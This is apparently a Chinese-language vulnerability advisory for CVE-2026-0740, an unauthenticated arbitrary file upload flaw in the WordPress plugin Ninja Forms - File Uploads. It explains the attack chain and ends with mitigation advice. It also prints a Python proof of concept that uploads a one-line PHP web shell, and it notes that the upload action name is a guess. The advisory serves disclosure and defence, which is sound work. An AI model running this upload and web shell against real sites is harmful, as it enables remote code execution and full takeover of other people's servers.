CVE-2026-0740 CVSS 9.8 严重

CVE-2026-0740 WordPress Ninja Forms任意文件上传漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0740

漏洞类型

任意文件上传

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ninja Forms - File Uploads Plugin

漏洞概述

WordPress插件Ninja Forms - File Uploads在3.3.26及之前版本中存在严重的安全漏洞。由于`NF_FU_AJAX_Controllers_Uploads::handle_upload`函数缺少必要的文件类型验证机制，未经身份验证的远程攻击者可以利用此漏洞上传任意恶意文件（如WebShell）。成功利用该漏洞可能导致攻击者在服务器上执行任意代码，完全接管受影响的网站。

技术细节

漏洞核心在于插件处理文件上传的`NF_FU_AJAX_Controllers_Uploads::handle_upload`函数中未对上传文件的类型和扩展名进行严格的校验。攻击者可以构造特定的HTTP POST请求，向目标WordPress站点发送包含恶意PHP代码的文件。由于无需身份验证（PR:N）且无用户交互（UI:N），攻击者可自动化批量扫描并利用此漏洞。一旦文件上传成功，攻击者只需通过浏览器访问该文件的URL即可触发代码执行，从而获得服务器权限。官方在3.3.25版本尝试修复但未彻底解决，直至3.3.27版本才完全修补此漏洞。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标站点，识别是否安装了易受攻击的Ninja Forms - File Uploads插件及其版本号。

STEP 2

2. 构造恶意请求

攻击者利用Python或Burp Suite构造包含恶意PHP文件的HTTP POST请求，发送至存在漏洞的上传接口。

STEP 3

3. 上传WebShell

由于缺少文件类型验证，服务器接收并保存了恶意文件到可访问的目录。

STEP 4

4. 执行任意代码

攻击者通过浏览器访问上传的文件路径，传入系统命令参数，在服务器端执行命令并获取回显。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
shell_filename = "shell.php"

# The malicious payload to upload
payload = """<?php system($_GET['cmd']); ?>"""

# Data for the request, exploiting the vulnerable action
# Note: The specific action name might vary based on plugin internals
files = {
    'file': (shell_filename, payload, 'application/octet-stream')
}
data = {
    'action': 'nf_fu_ajax_upload'  # Hypothetical action based on function name
}

try:
    response = requests.post(target_url, files=files, data=data)
    if response.status_code == 200:
        print(f"[+] Payload uploaded successfully!")
        print(f"[+] Check your shell at: http://example.com/wp-content/uploads/{shell_filename}")
    else:
        print(f"[-] Upload failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

Ninja Forms - File Uploads <= 3.3.26

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Ninja Forms - File Uploads插件功能。此外，应在Web服务器层面（如Apache .htaccess或Nginx配置）严格限制上传目录的脚本执行权限，禁止解析PHP等脚本文件，从而阻断WebShell的运行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表